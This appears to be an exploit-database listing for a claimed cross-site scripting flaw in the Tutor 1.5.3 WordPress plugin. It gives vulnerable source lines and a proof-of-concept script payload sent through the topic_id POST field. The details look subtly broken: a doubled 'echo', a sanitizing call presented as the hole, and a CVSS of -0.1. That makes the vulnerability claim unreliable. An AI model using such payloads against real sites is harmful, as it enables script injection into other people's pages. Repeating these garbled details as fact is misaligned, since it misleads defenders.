Exploit for WordPress Tutor 1.5.3 Cross Site Scripting

Name: Exploit for WordPress Tutor 1.5.3 Cross Site Scripting
Rating: 5 (105 reviews)

2020-02-12 | CVSS -0.1

## https://sploitus.com/exploit?id=PACKETSTORM:156304
[-] Tile: Wordpress Plugin tutor.1.5.3 - Cross-Site Scripting  
[-] Author: mehran feizi  
[-] Category: webapps  
[-] Date: 2020.02.12  
===================================================================  
Vulnerable page:  
/Quiz.php  
===================================================================  
Vulnerable Source:  
473: echo echo $topic_id;  
447: $topic_id = sanitize_text_field($_POST['topic_id']);  
===================================================================  
Exploit:  
localhost/wp-content/plugins/tutor/classes/Quiz.php and  
$_POST('topic_id')= <script>alert('mehran')</script>  
=================================================================================